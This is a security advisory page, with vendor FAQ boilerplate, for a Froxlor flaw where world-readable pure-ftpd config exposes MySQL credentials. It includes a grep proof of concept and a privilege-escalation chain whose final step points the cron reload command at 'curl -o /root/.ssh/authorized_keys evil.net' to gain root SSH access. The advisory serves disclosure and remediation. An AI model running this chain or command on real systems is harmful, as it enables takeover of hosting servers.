Summary
In Froxlor 2.1.9 and in the HEADs of the main, v2.2 and v2.1 branches , the XML templates in lib/configfiles/ set chmod 644 for /etc/pure-ftpd/db/mysql.conf, although that file contains <SQL_UNPRIVILEGED_PASSWORD>. At least on Debian 12, all parent directories of /etc/pure-ftpd/db/mysql.conf are world readable by default, thus exposing these credentials to all users with access to the system. Only Froxlor instances configured to use pure-ftpd are affected/vulnerable.
Details
https://github.com/froxlor/Froxlor/blob/2.1.9/lib/configfiles/bookworm.xml#L3075
PoC
As non-privileged user:
nobody@mail:/tmp$ grep MYSQLPassword /etc/pure-ftpd/db/mysql.conf
MYSQLPassword MySecretMySQLPasswordForFroxlor
Impact
Any unprivileged user with "command/code execution" access to the system can trivially obtain the credentials granting access to the froxlor MySQL database. This holds true even for virtual users without SSH access as long as they are able to upload their own PHP scripts or other CGIs, and works even if the admin has setup a separate php-fpm pool that runs as their own user.
Side note: This access to the database can be leveraged to obtain Froxlor admin privileges, and subsequently root privileges. For example:
- Use the database credentials to extract or change a Froxlor admin's password hash and TOTP seed value.
- Log into Froxlor as that admin.
- Set the
Cron-daemon reload commandin/admin_settings.php?page=overview&part=crondto something likecurl -o /root/.ssh/authorized_keys evil.net. - Wait a few minutes until the relevant cronjob runs, then log in via SSH.
Please consider using passwordless unix socket authentication. Current versions of MySQL, MariaDB and Percona allow completely removing/omitting database passwords for database connections going through a unix socket, this works even for use cases where the database user has a different name than the system account running the database client:
https://dev.mysql.com/doc/refman/5.7/en/socket-pluggable-authentication.html
A file, directory, or other resource is assigned permissions that allow broader access than intended. Typical impact: unauthorized read, modification, or execution of the resource.
GHSA-34QG-65M4-F23M has a CVSS score of 7.3 (High). The vector is requires local access, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.2.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-34QG-65M4-F23M? GHSA-34QG-65M4-F23M is a high-severity incorrect permission assignment for critical resource vulnerability in froxlor/froxlor (composer), affecting versions <= 2.2.0-rc3. It is fixed in 2.2.0. A file, directory, or other resource is assigned permissions that allow broader access than intended.
- How severe is GHSA-34QG-65M4-F23M? GHSA-34QG-65M4-F23M has a CVSS score of 7.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of froxlor/froxlor are affected by GHSA-34QG-65M4-F23M? froxlor/froxlor (composer) versions <= 2.2.0-rc3 is affected.
- Is there a fix for GHSA-34QG-65M4-F23M? Yes. GHSA-34QG-65M4-F23M is fixed in 2.2.0. Upgrade to this version or later.
- Is GHSA-34QG-65M4-F23M exploitable, and should I be worried? Whether GHSA-34QG-65M4-F23M is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-34QG-65M4-F23M is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-34QG-65M4-F23M? Upgrade
froxlor/froxlorto 2.2.0 or later.